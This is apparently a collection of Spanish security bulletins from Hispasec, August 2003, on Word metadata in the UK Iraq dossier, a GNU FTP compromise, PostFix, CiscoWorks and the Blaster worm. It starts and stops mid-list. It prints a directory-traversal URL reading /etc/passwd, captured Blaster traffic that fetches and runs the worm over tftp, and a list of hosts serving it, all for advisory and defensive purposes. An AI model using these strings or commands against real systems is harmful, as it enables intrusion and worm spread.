Sobig.F
http://www.pandasoftware.es/virus_info/enciclopedia/verficha.aspx?idvirus=40408&sind=0

Win32/Sobig.F@mm
http://www.ravantivirus.com/virus/showvirus.php?v=198

W32.Sobig.F@mm
http://www.sarc.com/avcenter/venc/data/w32.sobig.f@mm.html

W32/Sobig-F
http://www.sophos.com/virusinfo/analyses/w32sobigf.html

W32/Sobig-F
http://www.sybari.com/alerts/alertdetail.asp?Name=W32/Sobig-F

WORM_SOBIG.F
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOBIG.F

W32/Sobig.F.Nueva versión del Sobig
http://www.vsantivirus.com/sobig-f.htm

lunes, 18 de agosto de 2003

Detalles sobre los datos ocultos en el informe sobre Irak

Dada la repercusión y el número de consultas que ha suscitado el
artículo de ayer sobre los datos que se ocultan en los documentos de
Microsoft Word (Metadata), vamos a proponer en esta entrega que los
lectores reproduzcan un caso práctico. En concreto, descargaremos el
documento original publicado por el gobierno británico y veremos
como es trivial conseguir el listado de personas que manejaron el
documento. Por último, algunas recomendaciones prácticas para poder
seguir utilizando Word y evitar la filtración de información sensible.

Como comentamos en la anterior entrega
http://www.hispasec.com/unaaldia/1757 , el gobierno británico publicó
un expediente, en formato Microsoft Word, sobre la evidencia de armas
de destrucción masiva en Irak. Posteriormente se demostró que el
informe era en realidad un plagio de antiguas publicaciones. En medio
de este revuelo se desveló que el documento Word publicado incluía
oculto en su interior datos sobre las personas que lo habían editado.

El documento original fue publicado en la web oficial 10 Downing Street
http://www.number-10.gov.uk/ , si bien ya ha sido retirado. Sin
embargo podemos obtener una copia del original desde el web de Richard
M. Smith, enlace http://www.computerbytesman.com/privacy/blair.doc

Para acceder a los datos ocultos del documento (Metadata), en vez de
hacer clic directamente en la dirección anterior, lo que nos abriría
directamente el archivo blair.doc en Microsoft Word, lo que haremos
será copiarlo en nuestro sistema. Para ello, haremos clic con el
botón derecho del ratón en el enlace anterior, y en el menú
desplegable que aparecerá escogeremos la opción "Guardar destino
como", y elegiremos alguna carpeta.

Una vez tenemos la copia en nuestro sistema, abrimos Microsoft Word
como si fuéramos a escribir un nuevo documento. Desde el menú Archivo,
elegimos la opción de Abrir, y en la ventana que aparece, en el
apartado "Tipo de Archivo", desplegamos el listado de formatos y
seleccionamos "Recupera el texto de cualquier archivo (*.*)". De esta
forma podemos abrir documentos en texto plano, mostrándonos todo el
contenido, incluido los Metadata. Desde la ventana donde nos
encontramos, sólo nos queda buscar la carpeta donde hicimos la
copia y elegir el archivo "blair.doc". (Otra opción es utilizar su
editor favorito en vez de Word, incluido el bloc de notas).

El documento aparecerá en Microsoft Word, si bien notaremos que no
se encuentra formateado (no hay diferentes tipos de letra,
alineaciones, negritas, subrayados, etc.). Si avanzamos en el
documento, en sus últimas páginas, podremos visualizar diversas
etiquetas, cabeceras, logs, y datos que quedan ocultos cuando un
documento de Word se abre normalmente (Metadata).

Entre esos datos podemos encontrar los siguientes:

cic22J C:\DOCUME~1\phamill\LOCALS~1\Temp\AutoRecovery save of Iraq - security.asd
cic22J C:\DOCUME~1\phamill\LOCALS~1\Temp\AutoRecovery save of Iraq - security.asd
cic22J C:\DOCUME~1\phamill\LOCALS~1\Temp\AutoRecovery save of Iraq - security.asd
JPratt C:\TEMP\Iraq - security.doc
JPratt A:\Iraq - security.doc
ablackshaw C:\ABlackshaw\Iraq - security.doc
ablackshaw C:\ABlackshaw\A;Iraq - security.doc
ablackshaw A:\Iraq - security.doc
MKhan C:\TEMP\Iraq - security.doc
MKhan C:\WINNT\Profiles\mkhan\Desktop\Iraq.doc

Se trata del listado de revisiones, Microsoft guarda por defecto los
datos de las últimas 10 ediciones que ha sufrido el documento. En
primer lugar aparece el nombre de usuario y a continuación el nombre
de archivo completo donde se almacenó.

Dada las iniciales, y con un mínimo de información sobre el personal
del gobierno británico, es fácil ponerle nombres y apellidos:

Las iniciales cic22j de la primera entrada corresponden a
"Communications Information Centre", departamento del gobierno
británico, mientras que las iniciales que aparecen en la carpeta
donde se almacena el documento (phamill) pertenecen al oficial
Paul Hamill.

El resto de entradas:

JPrat = John Pratt: oficial de Downing Street

ablackshaw = Alison Blackshaw: asistente personal del secretario de
prensa del Primer Ministro.

MKhan = Murtaza Khan: oficial de prensa del Primer Ministro

Durante la comparecencia en el parlamento de Alastair Campbell,
director de comunicaciones del gobierno británico, tuvo que dar
explicaciones sobre la edición del documento, que había resultado
ser un plagio. Entre los detalles que ofreció llegó a comentar que
John Pratt facilitó el informe en un disquete a Alison Blackshaw
que a su vez lo entregó a Colin Powell para su presentación ante las
Naciones Unidas. Curiosamente en el log también quedó reflejado
como John Pratt pasa el documento de su disco duro a la disquetera.


Como evitar los efectos negativos de Metadata

El uso de Microsoft Word no entraña peligro alguno, siempre y cuando
se conozca al detalle funcionalidades como las descritas. El principal
problema de los datos ocultos se encuentra a la hora de publicar los
documentos o permitir que terceras personas tengan acceso al archivo.
En estos casos el formato de Word no es el más adecuado, entre otras
razones por los motivos que ya hemos descrito.

Una de las opciones que permite Word es exportar a otros formatos que
no incluyen los datos ocultos, como por ejemplo HTML o RTF. Basta con
escoger la opción "Guardar como" del menú "Archivo", y en la casilla
"Guardar como tipo" escoger el formato adecuado, por ejemplo RTF.
Si tiene necesidad de enviar un documento Word a un tercero, es una
buena elección.

Otras opciones pasan por hacer una configuración más personalizada
y fina de Word para evitar los Metadata, o editar manualmente los
datos del documento desde la opción "Propiedades" del menú "Archivo".
Por descontado, otra opción es utilizar un producto diferente a Word.

En el apartado "Más información" encontrarán un enlace de Microsoft
donde se describen al detalle diversas formas de minimizar el
impacto de los datos ocultos (Metadata) según versiones de sus
productos Office.

Bernardo Quintero
bernardo@hispasec.com


Más información:

17/08/2003 - Los documentos de Word esconden información sensible
http://www.hispasec.com/unaaldia/1757

Protecting Personal Data in Your Microsoft Word Documents
http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q223396&ID=KB;EN-US;Q223396&

Copia del documento original en Word publicado
http://www.computerbytesman.com/privacy/blair.doc

Detalles de los datos ocultos en el dossier
http://www.computerbytesman.com/privacy/blair.htm

[casi] Intelligence? the British dossier on Iraq's security infrastructure
http://www.casi.org.uk/discuss/2003/msg00457.html

Britain: Blair government caught out in plagiarism and lies over latest Iraq dossier
http://www.wsws.org/articles/2003/feb2003/cnew-f10.shtml

British Government accused of plagiarism over Iraq dossier
http://www.abc.net.au/pm/s779254.htm

El editor de textos Microsoft Word pone en ridículo al gobierno británico
http://ww2.grn.es/merce/2003/word.html

Online Document Search Reveals Secrets
http://yro.slashdot.org/article.pl?sid=03/08/15/2042249

domingo, 17 de agosto de 2003

Los documentos de Word esconden información sensible

Cuando escribe un documento con Word el archivo creado oculta
en realidad más datos de los que pueden verse a primera vista.
Versiones anteriores del documento, rectificaciones del mismo, o
los nombres de personas que han trabajado en él, pueden quedar
escondidos en el documento y extraerse posteriormente. El gobierno
británico acaba de abandonar el uso de Microsoft Word, en favor del
formato PDF, tras tener que dar explicaciones sobre información que
quedó oculta en un informe que utilizó como argumento en la guerra
de Irak.

Si es usuario de Word y redacta contratos, presupuestos, informes,
o cualquier otro tipo de documento con información sensible, debe ser
consciente que quién tenga acceso al archivo en formato Word podrá
acceder a información adicional, como por ejemplo el histórico de
cambios que se han realizado en el mismo. Imaginemos por un momento
que utiliza un documento Word como maestro que modifica y adapta para
enviar nuevos presupuestos o contratos. ¿Sabía que sus clientes o
trabajadores pueden acceder a los datos que había anteriormente en
el documento?.

El gobierno británico acaba de dar buena cuenta de ello tras verse
forzado a la comparecencia en la cámara de los comunes de Alastair
Campbell, director de comunicación y mano derecha de Tony Blair, para
dar más datos de cuatro empleados cuyos nombres aparecían ocultos
como autores del informe ya conocido como "dodgy dossier". Este
expediente fue publicado en febrero de 2003 como fruto del trabajo de
la inteligencia británica donde se evidenciaba la existencia en Irak
de armas de destrucción masiva. Poco tiempo después se demostró que el
informe era en realidad un plagio que contenía copias literales de
una antigua tesis de un estudiante californiano de apenas 13 años de
edad.

Un estudio llevado a cabo en abril de 2003 por Simon Byers, del
laboratorio de investigación de AT&T en los EE.UU., ha evidenciado
que gran parte de los documentos Microsoft Word publicados en Internet
contienen información sensible oculta. Desde nombres, direcciones de
e-mail, nombres de documentos relacionados, números de la seguridad
social, trayectorias de las unidades y carpetas donde estaba
almacenado el documento, etc.

La metodología de Byers consistió en recolectar 100.000 documentos Word
desde Internet de forma aleatoria, realizando búsquedas en el web
por palabras claves. Posteriormente los trató con utilidades gratuitas
como "antiword" o "catdoc" que permiten acceder a la información de
los documentos en texto plano. Más de la mitad de los documentos
mantenían entre 10 y 50 palabras ocultas, un tercio de los mismos
entre 50 y 500, y el 10% escondían más de 500 palabras en su interior.

La recomendación para aquellas organizaciones o usuarios que no quieran
correr el riesgo de ver filtrada información sensible en sus documentos
es tajante: dejar de utilizar Microsoft Word.

Aunque el reciente incidente protagonizado por el gobierno británico
ha fijado de nuevo la atención sobre estas "funcionalidades" de la
familia Microsoft Office, la realidad es que Hispasec ya dio buena
cuenta de ello en 1999. Recomiendo la lectura de dos artículos de
nuestro compañero Jesús Cea donde se explicaban los entresijos de los
GUIDs y Metadata en los documentos Microsoft Office, consejos para
evitar sus efectos, y como estos datos ocultos permitieron identificar
al autor del gusano "Melissa" (gusano de macro escrito en Word).


Bernardo Quintero
bernardo@hispasec.com


Más información:

31/08/1999 - Los GUIDs y los MetaData en los documentos Microsoft Office (I)
http://www.hispasec.com/unaaldia/308

01/09/1999 - Los GUIDs y los MetaData en los documentos Microsoft Office (II)
http://www.hispasec.com/unaaldia/309

Scalable Exploitation of, and Responses to Information Leakage
Through Hidden Data in Published Documents
http://www.user-agent.org/word_docs.pdf

antiword
http://www.winfield.demon.nl

catdoc
http://www.45.free.net/~vitus/ice/catdoc/

Online document search reveals secrets
http://www.newscientist.com/news/news.jsp?id=ns99994057

The hidden dangers of documents
http://news.bbc.co.uk/1/hi/technology/3154479.stm

Blair's "Dodgy Dossier"
http://slate.msn.com/id/2084872/


sábado, 16 de agosto de 2003

Vulnerabilidades en PostFix 1.1.*

Las versiones 1.1.* no actualizadas de PostFix contienen varias
vulnerabilidades accesibles a atacantes remotos. Una de ellas es un
ataque DoS (denegación de servicio).

PostFix es un MTA (Message Transfer Agent, servidor de correo)
alternativo a SendMail, diseñado específicamente con el fin de
reemplazarlo por un sistema más modular y seguro.

Las versiones 1.1.* no actualizadas de PostFix contienen, al menos, las
siguientes vulnerabilidades:

* Ataque DoS (denegación de servicio): Utiliza varios bugs en las
rutinas de análisis de direcciones de correo. El ataque permite bloquear
el gestor de colas, proceso "nqmgr", paralizando toda la gestión de
correo electrónico. También permite bloquear el gestor de una conexión
SMTP de forma repetida, bloqueando el servicio y, pendiendo de la
configuración, pudiendo afectar a toda la máquina.

Este ataque es efectivo, incluso, sobre servidores MTA no accesibles
desde Internet, si pueden recibir correo desde el exterior,
probablemente a través de otros servidores de correo intermedios.

* Uso de PostFix como agente DDoS y "escáner": Las versiones no
actualizadas de PostFix permiten que un atacante remoto les "induzca" a
conectarse a IPs y puertos arbitrarios, pudiendo usar el servidor como
"escáner" o, llegado el caso, como agente de un ataque de denegación de
servicio.

Estas vulnerabilidades están solucionadas en la versión 1.1.13 de
PostFix. La rama 2.0.* no se ve afectada por ellas.

Se recomienda a los administradores de sistemas PostFix que actualicen a
la versión 1.1.13 o superior, o que migren a la rama 2.0.* de este
servidor de correo electrónico.

PostFix se distribuye con una firma PGP. ¡¡Verifíquela!!. La clave
pública de "Wietse Venema" tiene una firma digital de un servidor que le
escribe, verificando su identidad, de... ¡diciembre de 1998!.


Jesús Cea Avión
jcea@hispasec.com


Más información:

PostFix
http://www.postfix.org/

PostFix 1.1.13
http://postfix.imasd.elmundo.es/source/official/postfix-1.1.13.tar.gz

viernes, 15 de agosto de 2003

Compromiso de seguridad en el servidor FTP del proyecto GNU

Se ha descubierto una intrusión de seguridad en el servidor de FTP del
proyecto GNU. Teóricamente, un atacante podría haber contaminado el
código fuente contenido en dicho sistema, que hospeda miles de
aplicaciones "Open Source".

La intrusión tuvo lugar en marzo, y se recomienda a todos los usuarios
de software GNU que revisen el código fuente descargado y verifiquen su
integridad a través de procedimientos criptográficos estándar.

Desde el descubrimiento de la intrusión, a finales de Julio, la FSF
(Free Software Foundation), patrocinadores del proyecto GNU, han estado
auditando el código fuente disponible en el servidor, a la caza de
troyanos o alteraciones maliciosas del mismo. La semana pasada se había
verificado ya el 80% del código, sin encontrar modificaciones no
autorizadas.

El convencimiento general es que el atacante pretendía obtener las
claves de los responsables de los diferentes proyectos GNU, más que
alterar su código fuente. En todo caso, la recomendación de revisar el
código GNU descargado desde marzo sigue en pie. La FSF ha recuperado
los códigos fuentes antiguos de sus sistemas de backups, y los fuentes
modificados desde marzo están siendo contrastados con sus autores, uno
a uno.

Este nuevo incidente de seguridad en la distribución de código Open
Source se suma a otros eventos recientes relativos al servidor OpenSSH,
por ejemplo, comprometido con un troyano hace justo un año.

La recomendación es evidente: Hay que asegurarse de que el código que
nos descargamos no ha sido alterado de forma maliciosa. Para lograr
dicho objetivo se pueden y se deben utilizar tecnologías criptográficas
que nos aseguren la integridad y la procedencia de los ficheros
descargados, usando herramientas del tipo PGP o GPG. El procedimiento es
muy similar al que nuestros lectores pueden utilizar para verificar la
identidad y la integridad de nuestros boletines "una al día", a través
de firmas digitales.

Ahora solo falta que los autores de programas OpenSource se acostumbren
a usar dichas herramientas para "sellar" su código, y que los usuarios
se acostumbren, nos acostumbremos, a verificar dicho "sello".

Tras este incidente, la FSF está publicando firmas digitales para el
software que distribuye. Confío en que cunda el ejemplo.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Nota de prensa oficial de la FSF
ftp://ftp.gnu.org/MISSING-FILES.README

Servidor FTP del Proyecto GNU Comprometido
http://www.unam-cert.unam.mx/Boletines/Boletines2003/boletin-UNAM-CERT-2003-021.html

FSF FTP Site Cracked, Looking for MD5 Sums
http://slashdot.org/article.pl?sid=03/08/13/1530239

Comprometido ftp.gnu.org desde el mes de Marzo
http://barrapunto.com/article.pl?sid=03/08/14/016217

CERT® Advisory CA-2003-21 GNU Project FTP Server Compromise
http://www.cert.org/advisories/CA-2003-21.html

GNU server attack raises Linux code concerns
http://www.nwfusion.com/news/2003/0814gnuserver.html

GNU FTP server compromised since March
http://www.kill-hup.com/article.pl?sid=03/08/14/1310208

GNU servers 'owned' by crackers since March
http://www.theregister.co.uk/content/55/32355.html

Firmas digitales
ftp://ftp.gnu.org/before-2003-08-01.md5sums.asc
ftp://alpha.gnu.org/before-2003-08-01.md5sums.asc

03/08/2002 - Troyano en la distribución de OpenSSH
http://www.hispasec.com/unaaldia/1378

CERT® Incident Note IN-2001-06
Verification of Downloaded Software
http://www.cert.org/incident_notes/IN-2001-06.html

jueves, 14 de agosto de 2003

Escala de directorios en Sun iPlanet Directory Server

Sun iPlanet Directory Server 5.1, se ve afectado entre otras
vulnerabilidades por la posibilidad de escalada de directorios.

Sun iPlanet Directory Server proporciona un directorio central para
almacenar y administrar perfiles de identidad, privilegios de acceso e
información sobre recursos de red y aplicaciones.

Se han identificado múltiples problemas de seguridad en Sun iPlanet
Directory Server con Administration Express que permitiría a un usuario
malicioso remoto escapar de la raíz del web y posteriormente llegar a
tomar el control del servidor atacado.

1) La función ViewLog permite al usuario suministrar rutas arbitrarias
y nombres de archivos empleando la secuencia "%2f..":

Ejemplos:
/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=
&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv

2) Múltiples aplicaciones setuid "root" son accesibles a usuarios
locales. Esto puede ser empleado para conseguir acceso a recursos
restringidos o elevar los privilegios.

Se debe actualizar a iPlanet Directory Server 5.1 Service Pack 2 o Sun
ONE Directory Server 5.2


Antonio Román
roman@hispasec.com


Más información:

Directory Traversal in Sun iPlanet Administration Server 5.1
http://www.securityfocus.com/archive/1/332399

miércoles, 13 de agosto de 2003

Vulnerabilidades en CiscoWorks Common Management Foundation (CMF)

Se ha anunciado la existencia de vulnerabilidades en CiscoWorks Common
Management Foundation (CMF), en las versiones 2.1 y anteriores.

CiscoWorks Common Management Foundation (CMF), incluido también como
parte de CiscoWorks CD One, proporciona las bases para una
infraestructura de aplicaciones, permitiendo que todas las
aplicaciones CiscoWorks compartan un modelo común para el intercambio
de datos, login, definiciones de usuarios, privilegios de accesos y
protocolos de seguridad.

La primera de las vulnerabilidades anunciadas es una escalada de
privilegios que permite a un usuario invitado la obtención de
privilegios administrativos dentro de la aplicación mediante una URL
específicamente creada.

La segunda vulnerabilidad reside en la posibilidad de ejecutar
comandos arbitrarios en el servidor CiscoWorks debido a un error en el
procesamiento de entrada del usuario.

Cisco ofrece actualizaciones para los CMF versiones 2.0 y 2.1.
Ambos problemas quedan resueltos en CiscoWorks Common Services 2.2.


Antonio Ropero
antonior@hispasec.com


Más información:

Cisco Security Advisory: CiscoWorks Application Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml

martes, 12 de agosto de 2003

Publicación del número 61 de "Phrack"

Acaba de publicarse el número 61 del conocido E-Zine "Phrack".

"Phrack", que cuenta ya con más de 16 años de historia, se centra en los
campos de "exploits" y nuevas tecnologías de "hacking", fundamentalmente
en entornos informáticos.

En este último número podemos encontrar artículos sobre:

* Anuncio de nuevas herramientas y utilidades
* Estudio sobre exploits malloc avanzados
* Falsificación del Linux Page Fault Handler
* Interfaz ELF (Executable and Linking Format) de Cerberus
* Motor de shell molimórfico
* Infección de Loadable Kernel Modules
* Construcción de código shell en unicode
* Fabricación de un disquete bomba
* Hacking del stack del kernel de red de Linux
* Experiencias sobre rootkits del kernel y el futuro

y otros temas menores.

De lectura recomendable para conocer el "estado del arte" en el mundo
"Underground".


Antonio Ropero
antonior@hispasec.com


Más información:

Phrack
http://www.phrack.org

lunes, 11 de agosto de 2003

W32/Blaster, un gusano con una alta incidencia

Tal como avanzamos ayer por la noche en un boletín de urgencia, se está
propagando con rapidez un gusano que ataca los ordenadores que utilizan
los sistemas operativos Windows (las versiones Windows NT 4.0, Windows
2000, Windows XP y Windows Server 2003).Este gusano se aprovecha de una
vulnerabilidad recientemente descubierta en la interfaz de peticiones a
procedimientos remotos (Remote Procedure Call, RPC) de Windows.

El verano del 2003 será recordado por dos hechos en los que la velocidad
de propagación ha sido un factor clave: la oleada de incendios
forestales y el gran número de usuarios que se ven forzados a reiniciar
sus PC debido a la distribución alcanzada por el gusano W32/Blaster.

W32/Blaster utiliza una vulnerabilidad presente en la interfaz RPC de
Windows, descrita a mediados del pasado mes de julio. Esta
vulnerabilidad permite a un atacante remoto (en este caso, el gusano)
obtener el control completo del sistema vulnerable y la ejecución de
código arbitrario.

El gusano dispone de un algoritmo para generar los rangos de direcciones
IP donde intenta localizar nuevos sistemas vulnerables en los que
intentará propagarse. Este algoritmo está pensado para aumentar las
probabilidades de atacar sistemas situados en redes cercanas.

Para cada dirección IP obtenida, el gusano analiza las 20 direcciones IP
siguientes, intentando establecer una conexión en el puerto 135/tcp. Si
la conexión es satisfactoria, el gusano utilizado dos exploits
diferentes para intentar infiltrarse en el sistema remoto. El primero de
estos exploits sólo funciona si el sistema remoto ejecuta Windows 2000
mientras que el segundo es válido en el caso de que el sistema remoto
utilice Windows XP.

Debido a que el gusano no intenta determinar que versión de Windows
utiliza el sistema remoto, sino que lanza uno u otro exploit de forma
aleatoria, en el momento de enviar el código del exploit puede provocar
la detención inesperada del proceso SVCHOST.EXE en el sistema atacado, l
o que provocará que el sistema se vuelva inestable. En estos casos, la
infección no será satisfactoria, pero el sistema atacado puede quedar
inoperativo.

La función del exploit utilizado es abrir una sesión del intérprete de
órdenes de Windows, asociada al puerto 4444/tcp. Dentro de esta sesión,
el gusano utiliza la utilidad tftp para transferir el código del gusano
al ordenador recién atacado.

Una vez ha conseguido entrar en un ordenador vulnerable, el gusano añade
una entrada en el registro para asegurar su ejecución automática en el
momento en que se reinicie el sistema operativo:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"windows auto update"="msblast.exe"

Por otra parte, el gusano también verifica la fecha del sistema. En el
caso de que el día del mes sea igual o posterior a 16, empezará a enviar
una gran cantidad de tráfico (paquetes de 40 bytes enviados cada 20
milisegundos) hacia el puerto 80/tcp de windowsupdate.com. La acción
combinada de un gran número de máquinas infectadas puede tener como
efecto un ataque distribuido de denegación de servicio contra el
servicio de actualizaciones de software de Microsoft.


Eliminación del gusano

Para eliminar manualmente el gusano de un ordenador infectado deben
realizarse los siguientes pasos:

1. Utilizar el administrador de tareas de Windows (accesible mediante la
combinación de teclas Control-Majús-Esc) para finalizar la ejecución
del proceso MSBLAST.EXE

2. Borrar el archivo MSBLAST.EXE del directorio de sistema de Windows

3. Utilizar el editor de registro para borrar la entrada añadida en el
registro
(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows Auto Update).

4. Reiniciar la máquina

Adicionalmente diversos fabricantes de programas antivirus han publicado
herramientas para realizar esta eliminación de forma automática. Algunas
de estas herramientas son

ftp://ftp.f-secure.com/anti-virus/tools/f-lovsan.zip
http://vil.nai.com/vil/stinger
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html

No obstante, tal como ya indicamos en nuestro boletín de ayer, la mejor
prevención pasa por evitar la entrada del gusano. Para ello es
importante aplicar la actualización publicada por Microsoft que elimina
la vulnerabilidad RPC de Windows. Esta actualización está disponible en
WindowsUpdate.com o bien descargando el parche específico para cada
versión de Windows (consultar el "una-al-día" del pasado 18 de julio
para las URL de estos parches).


Xavier Caballé
xavi@hispasec.com


Más información:

Una-al-día (10-08-03) - Aviso de urgencia: Un nuevo gusano de
propagación masiva
http://www.hispasec.com/unaaldia/1750

Una-al-día (18-07-03) - Desbordamiento de búfer en interfaz RPC de
sistemas Windows
http://www.hispasec.com/unaaldia/1728

MS DCOM RPC Worm
https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf

Gusano W32.Blaster
http://www.unam-cert.unam.mx/Notas/Notas2003/nota-UNAM-CERT-2003-008.html

Windows worm starts its spread
http://rss.com.com/2100-1002_3-5062364.html?type=pt∂=rss&tag=feed&subj=news

WORM_MSBLAST_A
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A

RPC DCOM Worm On The Loose
http://slashdot.org/article.pl?sid=03/08/11/2048249

Aviso del CERT CA-2003-20
W32/Blaster worm
http://www.cert.org/advisories/CA-2003-20.html

Win32.Poza
http://www3.ca.com/virusinfo/virus.aspx?ID=36265

Lovsan
http://www.datafellows.com/v-descs/msblast.shtml

W32/Blaster-A
http://www.sophos.com/virusinfo/analyses/w32blastera.html

Internet Security Systems Security Alert: "MS Blast" MSRPC DCOM Worm
Propagation
http://xforce.iss.net/xforce/alerts/id/150

Win32 Blaster Worm is on the Rise
http://slashdot.org/article.pl?sid=03/08/12/1326237

MSBlaster worm spreading rapidly
http://www.theregister.co.uk/content/56/32286.html

Detalles del virus Blaster
http://www.alerta-antivirus.es/virus/detalle_virus.html?cod=2880

W32/Lovsan.worm
http://vil.nai.com/vil/content/v_100547.htm

W32.Blaster.Worm
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

domingo, 10 de agosto de 2003

Aviso de urgencia: Un nuevo gusano de propagación masiva

Hemos empezado a recibir informes de un nuevo gusano que se está
empezando a propagar. Utiliza la reciente vulnerabilidad descubierta en
el mecanismo RPC de todas las versiones de Windows. En el momento de
redactar este boletín de urgencia todavía no se conoce en detalle el
funcionamiento del gusano, ya que todavía está siendo analizado. Uno de
los efectos de este gusano es que provoca al reinicio del ordenador
infectado cada pocos minutos. A pesar de no disponer de muchos datos
acerca del mismo, hemos decidido publicar este boletín para advertir a
todos los lectores de 'una-al-día' sobre su existencia así como indicar
las medidas necesarias a tomar para evitar su propagación.

El gusano realiza un barrido de las direcciones IP con el objeto de
identificar los sistemas Windows vulnerables (sistemas con el puerto
135/tcp accesible). Cuando detecta la existencia de un sistema
vulnerable, utiliza la vulnerabilidad RPC para abrir una sesión del
intérprete de órdenes accesible de forma remota a través del puerto
4444/tcp.

Dentro de esta sesión, procede a descargar mediante tftp el código
binario de gusano. Este es el tráfico capturado de una máquina
infectada:

-------------tráfico 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349





Forbidden


Forbidden


Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.



-------------tráfico 4444/tcp----------

mblast.exe es un archivo ejecutable de Windows, comprimido y que ocupa 6
KB. Su hash MD5 es

MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

La descarga del mismo puede realizarse contra uno de estos servidores
tftp:

204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3

El gusano crea una entrada en el registro de Windows para ejecutarse
automáticamente cada vez que se arranca el sistema:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"windows auto update"="msblast.exe"


Más vale prevenir que curar

Para evitar la entrada del gusano, es importante verificar estos dos
aspectos clave:

1. Impedir las conexiones al puerto 135/tcp procedente de redes
inseguras, como puede ser Internet.
2. Verificar que se ha aplicado la actualización publicada por Microsoft
para eliminar la vulnerabilidad RPC. Esta actualización está disponible
a través del servicio Windows Update o bien descargando la actualización
específica (ver el "una-al-día" del pasado 18 de julio para las URL de
la actualización para cada versión de Windows).


Eliminación del virus

Los diferentes fabricantes de productos antivirus están en estos
momentos analizando el gusano y es de esperar que en pocos minutos
dispongan de actualizaciones que permitan eliminarlo. Aconsejamos a
todos los lectores de 'una-al-día' que procedan a realizar una
actualización del archivo de firmas de su programa antivirus y, a
continuación, una verificación integral de su ordenador.


Xavier Caballé
xavi@hispasec.com



sábado, 9 de agosto de 2003

Parche de actualización de Kernel de Sun Solaris 8

Se ha lanzado un parche de actualización del kernel de Sun Solaris 8
para solucionar una serie de problemas detectados.

Entre los problemas corregidos figuran los siguientes:
* El kernel trunca los archivos core de 32 bits a 2GB si estos exceden
ese tamaño.
* La función core() no da información cuando do_core() falla con
EFBIG.
* La función core_write() no maneja correctamente las escrituras
parciales.
* El archivo /etc/name_to_sysnum es sobrescrito a causa de que su tipo
es "f".
* El sistema puede invalidar cuotas cuando se desmontan sistemas de
archivos.
* El ID de dispositivo CPU no figuraba en el kstats de cpu_info.
* El retorno prematuro de cv_wait_sig() causa el bloqueo en DR.
* La opción "-o unassign" no funciona si la placa está desconectada.
* La trampa 'Clean windows' no pone el tipo fallo en el registro
adecuado.
* El sistema entra en pánico cuando una tarjeta PCI se configura con
conexión en caliente.
* Conectar en caliente una tarjeta Jasper da mensajes de aviso cuando
se configura.
* pcicfg no pasa correctamente el bit de prefetch al localizador PCI.
* Poner la propiedad no-streaming-cache en Cassini expone a una
filtración en pci_fdvma_release().
* Pueden verse mensajes incorrectos en ndi_ra_free mientras se está
desconfigurando qlc.
* Utilizar ipcsumdbg() hace al sistema caer a OBP.
* Error al quitar la placa del slot 0 teniendo memoria permanente y
grandes segmenos ISM.
* Pueden entrar nuevos mensajes al perímetro mientras el mensaje
referenciado por qwrite está esperando.
* El driver openprom da mensajes de pánico cuando se hace un debug al
kernel.
* No se puede cargar el modulo openeepr en sistemas 4m/4d.

Los parches para corregir estos problemas están disponibles en las
siguientes direcciones:
Plataforma SPARC:
http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=108528&method=f
Plataforma x86:
http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=108529&method=f


Julio Canto
jcanto@hispasec.com


Más información:

SunOS 5.8: kernel update patch
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108528&rev=23

viernes, 8 de agosto de 2003

Cross Site Scripting en servidores BEA WebLogic

Se ha detectado una vulnerabilidad en WebLogic que posibilita a un
atacante la construcción de ataques de Cross Site Scripting.

WebLogic es un servidor de aplicaciones de la empresa BEA Systems,
especialmente indicado para entornos dirigidos al comercio
electrónico. Lo que añade a esta vulnerabilidad un peligro adicional.

El problema reside en que determinados parámetros no se verifican
adecuadamente antes de ser devueltos al usuario. Esto puede ser
explotado para realizar los ataques de Cross Site Scripting.

Múltiples scripts de ejemplos se ven afectados por este
problema, las aplicaciones a medida también pueden estar afectadas.

Las versiones afectadas por este problema son:

BEA Systems Liquid Data 1.1
BEA Systems WebLogic Express 5.1
BEA Systems WebLogic Express 6.1
BEA Systems WebLogic Express 7.0
BEA Systems WebLogic Integration 7.0
BEA Systems WebLogic Server 5.1
BEA Systems WebLogic Server 6.1
BEA Systems WebLogic Server 7.0

Los parches para evitar este problema se encuentran disponible en
la dirección.

WebLogic Server 7.0 SP2
ftp://ftpna.beasys.com/pub/releases/security/CR105443_70sp2-v2.jar

WebLogic Integration 7.0 SP2:
ftp://ftpna.beasys.com/pub/releases/security/tempPatchCR103371_WLI70SP2.zip

WebLogic Server 6.1 SP3:
ftp://ftpna.beasys.com/pub/releases/security/CR105443_610sp3.jar

WebLogic Integration 2.1:
ftp://ftpna.beasys.com/pub/releases/security/tempPatchCR105536_WLI21SP2.zip

WebLogic Server 6.1 SP2:
